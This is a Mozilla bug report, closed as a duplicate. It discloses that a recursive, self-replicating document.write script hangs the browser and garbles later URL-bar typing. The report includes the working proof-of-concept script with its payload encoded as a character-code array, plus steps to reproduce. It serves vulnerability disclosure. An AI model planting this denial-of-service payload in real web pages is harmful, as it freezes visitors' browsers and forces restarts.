Closed
Bug 214198
Opened 21 years ago
Closed 21 years ago
Mozilla does not detect and ignore malicious recursive document.write <script>
Categories
(Core :: DOM: Core & HTML, defect)
Tracking
()
RESOLVED
DUPLICATE
of bug 185945
People
(Reporter: ptchristendom, Unassigned)
Details
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.5a) Gecko/20030718 Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.5a) Gecko/20030718 Paste this script into a text file and view it in mozilla (as html). Mozilla will give me an hourglass, and be sluggish. After I finally hit stop, things work almost OK except that when I type in the URL bar, the LETTERS COME OUT BACKWARDS, e.g., "moc.elgoog.www". (the arrow keys don't work either). Mozilla must be restarted before it will work right again -------------------------CUT HERE------------------------------------- <script>var c=1; var a=new Array(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,99,32,43,32,34,46,32,60,115,99,114,34,43,34,105,112,116,62,118,97,114,32,99,61,34,32,43,32,40,99,43,49,41,32,43,32,34,59,32,118,97,114,32,97,32,61,32,110,101,119,32,65,114,114,97,121,40,34,32,43,32,97,46,106,111,105,110,40,41,32,43,32,34,41,59,34,41,59,13,10,102,111,114,40,118,97,114,32,105,32,61,32,48,59,32,105,32,60,32,97,46,108,101,110,103,116,104,59,32,105,43,43,41,32,100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,83,116,114,105,110,103,46,102,114,111,109,67,104,97,114,67,111,100,101,40,97,91,105,93,41,41,59,13,10,60,47,115,99,114,105,112,116,62); document.write(c + ". <scr"+"ipt>var c=" + (c+1) + "; var a = new Array(" + a.join() + ");"); for(var i = 0; i < a.length; i++) document.write(String.fromCharCode(a[i])); </script> Reproducible: Always Steps to Reproduce: 1. Paste the script into C:\test.html 2. Go to file:c:\test.html 3. Hit stop 4. Try to type in a new address Actual Results: See details Expected Results: Mozilla should refuse to render nested document.write scripts after a certain level deep. (IE 6.0 will print "1. 2. 3. 4. 5." and then stop) Problem also existings in 1.4.something. 1.2.1 just crashes. This bug allows malicious web programmers or XSS vulnerabilities to annoy the browser, forcing him to restart mozilla. Also test for similar tricks using eval(). I have not tried this.
Comment 1•21 years ago
|
||
> Mozilla should refuse to render nested document.write scripts after a certain
> level deep. (IE 6.0 will print "1. 2. 3. 4. 5." and then stop)
I've certainly seen pages that have nested scripts more than 5 levels deep and
work fine with IE....
In any case, this is DOM all the way, not JS engine.
Component: JavaScript Engine → DOM Level 0
Comment 2•21 years ago
|
||
.
Assignee: rogerl → dom_bugs
Status: UNCONFIRMED → NEW
Ever confirmed: true
QA Contact: pschwartau → ashishbhatt
Comment 3•21 years ago
|
||
Duplicate of bug 185945? "Recursive document.write() prevents browser from shutting down completely"
Whiteboard: DUPEME
Reporter | ||
Comment 4•21 years ago
|
||
*** This bug has been marked as a duplicate of 185945 ***
Status: NEW → RESOLVED
Closed: 21 years ago
Resolution: --- → DUPLICATE
You need to log in
before you can comment on or make changes to this bug.
Description
•